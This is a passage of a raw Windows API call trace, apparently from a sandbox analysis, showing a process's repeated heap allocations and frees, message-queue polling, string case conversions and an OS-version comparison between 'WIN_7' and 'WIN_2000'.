returned 0x24ab310 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.169] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0259.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0259.169] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0259.170] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0259.170] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.170] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.171] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.172] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.174] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0259.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0259.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.175] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.176] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.176] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0259.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.176] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0259.177] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0259.177] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0259.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0259.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: 